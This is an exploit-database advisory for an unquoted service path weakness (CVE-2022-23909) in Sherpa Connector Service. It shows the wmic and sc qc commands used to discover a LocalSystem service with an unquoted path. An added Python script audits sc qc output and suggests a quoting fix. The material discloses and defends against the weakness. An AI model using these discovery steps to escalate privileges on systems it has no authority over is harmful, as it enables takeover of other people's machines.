
9 changes to exploits/shellcodes Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path binutils 2.37 - Objdump Segmentation Fault Kramer VIAware - Remote Code Execution (RCE) (Root) Opmon 9.11 - Cross-site Scripting Zenario CMS 9.0.54156 - Remote Code Execution (RCE) (Authenticated) KLiK Social Media Website 1.0 - 'Multiple' SQLi minewebcms 1.15.2 - Cross-site Scripting (XSS) qdPM 9.2 - Cross-site Request Forgery (CSRF) ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Deletion
36 lines
No EOL
1.2 KiB
Text
# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path
# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)
# Version: 2020.2.20328.2050
# Date: 02/04/2022
# Vendor Homepage: http://gimmal.com/
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10
# CVE: CVE-2022-23909

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode | findstr /i "sherpa" | findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Sherpa Connector Service    Sherpa Connector Service    C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe    Auto

C:\>sc qc "Sherpa Connector Service"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sherpa Connector Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Sherpa Connector Service
        DEPENDENCIES       : wmiApSrv
        SERVICE_START_NAME : LocalSystem
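
A defensive audit for the condition reported above, as an added example (not part of the original advisory or the vendor's code): it parses `sc qc` output, flags an unquoted BINARY_PATH_NAME that contains spaces, and builds the quoted replacement. The function names and the trimmed sample input are constructed for illustration.

```python
import re

# Constructed sample: the `sc qc` output from this advisory, trimmed, wrapped path rejoined.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Sherpa Connector Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files\Sherpa Software\Sherpa Connector\SherpaConnectorService.exe
        DISPLAY_NAME       : Sherpa Connector Service
        SERVICE_START_NAME : LocalSystem
"""

def parse_sc_qc(text):
    """Map FIELD -> value for each 'FIELD : value' line of `sc qc` output."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]{3,})\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields

def audit_image_path(image_path):
    """Flag an unquoted executable path containing spaces; return the quoted form."""
    p = image_path.strip()
    if p.startswith('"'):                       # already quoted: unambiguous
        return {"vulnerable": False, "fixed": p}
    # Split the executable from its arguments at the first ".exe" token boundary.
    m = re.match(r"(?i)(.+?\.exe)(\s.*)?$", p)
    exe, args = (m.group(1), m.group(2) or "") if m else (p, "")
    vulnerable = " " in exe
    return {"vulnerable": vulnerable, "fixed": f'"{exe}"{args}' if vulnerable else p}

def audit_service(sc_qc_text):
    """Audit one service from its `sc qc` output and propose a remediation."""
    f = parse_sc_qc(sc_qc_text)
    result = audit_image_path(f.get("BINARY_PATH_NAME", ""))
    result["name"] = f.get("SERVICE_NAME", "")
    result["account"] = f.get("SERVICE_START_NAME", "")
    result["start"] = (f.get("START_TYPE", "").split() or [""])[-1]
    if result["vulnerable"]:
        # Suggested fix (review before running): re-register the path with quotes.
        escaped = result["fixed"].replace('"', '\\"')
        result["remediation"] = f'sc config "{result["name"]}" binPath= "{escaped}"'
    return result

if __name__ == "__main__":
    for key, value in audit_service(SAMPLE_SC_QC).items():
        print(f"{key:12} {value}")
```

The `account` and `start` fields give triage context: here the flagged service starts automatically and runs as LocalSystem.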